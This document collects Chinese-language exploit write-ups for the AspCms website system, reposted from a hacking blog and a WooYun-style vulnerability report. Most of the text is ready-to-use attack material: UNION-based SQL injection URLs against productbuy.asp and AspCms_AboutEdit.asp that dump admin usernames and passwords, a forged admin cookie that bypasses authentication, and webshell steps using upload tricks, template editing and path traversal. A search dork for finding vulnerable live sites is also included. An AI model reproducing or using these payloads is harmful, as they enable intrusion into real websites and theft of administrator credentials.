//////////////
aspcms_1.5__cookie_注入oday

http://115.com/file/bhkf7cy3#
aspcms_1.5__cookie_注入oday(演示视频)_.zip

///////////////
aspcms建站系统注入0day
分类：安全 | 2011年09月7号 | 撸过87次 
0 人扯淡 
aspcms开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且

支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。

漏洞文件：/plug/productbuy.asp

对接收的参数id没有进行过滤而导致的注入漏洞

注入后的页面有跳转，所以要快，建议用快捷键复制

爆用户名EXP:

http://www.webshell.cc/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1这是爆ID=1的账户名，如果发现权限不够可以往后试2,3,4………..
爆密码

http://www.webshell.cc/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1后台登录地址：/admin/login.asp

后台拿shell

1、直接上传.asp;x

2、系统配置信息

3、模版管理新建1.asp模板，内容写马的内容.

搜索关键词：搜索关键词：intitle:Powered by AspCms2


文章来自: WebShell'S Blog 本文地址：http://www.webshell.cc/1165.html



 aspcms 后台文件无验证注入+ cookies欺骗 相关厂商： ASPCMS漏洞作者： 独角兽 提交时间： 2012-02-10公开时间： 2012-02-10漏洞类型： SQL注射漏洞危害等级： 高自评Rank： 10漏洞状态： 未联系到厂商或者厂商积极忽略 漏洞来源： http://www.wooyun.orgTags标签： asp+sqlserver注射 黑盒hacking技巧 webshell cookie欺骗 任意文件写入利用 aspcms 分享漏洞： 腾讯微博 新浪微博 Twitter 网易微博 豆瓣 
--------------------------------------------------------------------------------

漏洞详情披露状态：2012-02-10： 积极联系厂商并且等待厂商认领中，细节不对外公开
2012-02-10： 厂商已经主动忽略漏洞，细节向公众公开

简要描述：后台文件 AspCms_AboutEdit.asp 未进行验证，且未过滤，导致SQL注入。而且纯在cookies欺骗！
详细说明：――――――――后台注射――――――――

http://www.aspcms.com/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1

版本不同需要更改值。

――――――Cookies欺骗――――――

cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9

――――――webshell获取――――――
所有版本存在后台编辑风格 可以修改任意文件，获取webshell就很简单了
AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp



admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1
 
――――――――――――――――――――――――
 Powered by AspCms2.0
 未验证权限，且存在注入漏洞
 admin/_content/_About/AspCms_AboutEdit.asp?id=19
 表名：aspcms_user
 列名：loginname、password
 
利用EXP：
 admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1 

2.0漏洞测试人：逍遥复仇（请注明）
 
――――――Cookies欺骗――――――
 cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
 逍遥复仇碰到一个站后台被管理员改了，NND。后台主页半天没有找到，最后去官方down源码查看是home.asp（版本不同如不对请试main.asp），工具为：Cookie & Inject Browser
 ――――――webshell获取――――――
 所有版本存在后台编辑风格 可以修改任意文件，获取webshell就很简单了
 admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp

 

